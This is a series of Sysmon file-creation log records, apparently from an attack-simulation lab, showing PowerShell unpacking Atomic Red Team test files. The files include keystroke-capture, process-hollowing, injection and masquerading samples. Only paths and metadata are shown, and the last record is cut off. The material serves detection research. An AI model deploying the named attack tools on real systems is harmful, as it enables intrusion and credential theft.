{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.727\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Labs\\Webinar11062017-Labs.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.727","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.727","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Labs\\Webinar11062017-Labs.bat","CreationUtcTime":"2020-08-01 06:55:11.727","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.743\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Misc\\Discovery.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.743","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.743","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Misc\\Discovery.bat","CreationUtcTime":"2020-08-01 06:55:11.743","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:11.993\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1014\\bin\\puppetstrings.exe\r\nCreationUtcTime: 2020-08-01 06:55:11.993","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:11.993","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1014\\bin\\puppetstrings.exe","CreationUtcTime":"2020-08-01 06:55:11.993","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:12.071\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\r\nCreationUtcTime: 2020-08-01 06:55:12.071","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:12.071","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1027.004\\bin\\T1027.004_DynamicCompile.exe","CreationUtcTime":"2020-08-01 06:55:12.071","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:12.102\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\bin\\T1036.003.exe\r\nCreationUtcTime: 2020-08-01 06:55:12.102","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:12.102","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\bin\\T1036.003.exe","CreationUtcTime":"2020-08-01 06:55:12.102","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.102\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.102","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.102","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.ps1","CreationUtcTime":"2020-08-01 06:55:12.102","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.102\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.vbs\r\nCreationUtcTime: 2020-08-01 06:55:12.102","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.102","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.vbs","CreationUtcTime":"2020-08-01 06:55:12.102","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.102\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_test.bat\r\nCreationUtcTime: 2020-08-01 06:55:12.102","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.102","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_test.bat","CreationUtcTime":"2020-08-01 06:55:12.102","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:12.196\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\bin\\T1055.exe\r\nCreationUtcTime: 2020-08-01 06:55:12.196","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:12.196","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\bin\\T1055.exe","CreationUtcTime":"2020-08-01 06:55:12.196","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.196\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\Win32\\T1055.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.196","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.196","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\Win32\\T1055.dll","CreationUtcTime":"2020-08-01 06:55:12.196","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.212\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\x64\\T1055.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.212","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.212","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\x64\\T1055.dll","CreationUtcTime":"2020-08-01 06:55:12.212","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.212\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.012\\src\\Start-Hollow.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.212","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.212","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.012\\src\\Start-Hollow.ps1","CreationUtcTime":"2020-08-01 06:55:12.212","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.227\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\Win32\\T1055.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.227","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.227","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\Win32\\T1055.dll","CreationUtcTime":"2020-08-01 06:55:12.227","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.227\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\x64\\T1055.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.227","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.227","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\x64\\T1055.dll","CreationUtcTime":"2020-08-01 06:55:12.227","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.243\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.243","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.243","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1","CreationUtcTime":"2020-08-01 06:55:12.243","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.258\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x64.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.258","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.258","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x64.dll","CreationUtcTime":"2020-08-01 06:55:12.258","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.258\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x86.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.258","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.258","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x86.dll","CreationUtcTime":"2020-08-01 06:55:12.258","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.258\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004.sln\r\nCreationUtcTime: 2020-08-01 06:55:12.258","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.258","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004.sln","CreationUtcTime":"2020-08-01 06:55:12.258","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.258\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004\\T1056.004.vcxproj\r\nCreationUtcTime: 2020-08-01 06:55:12.258","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 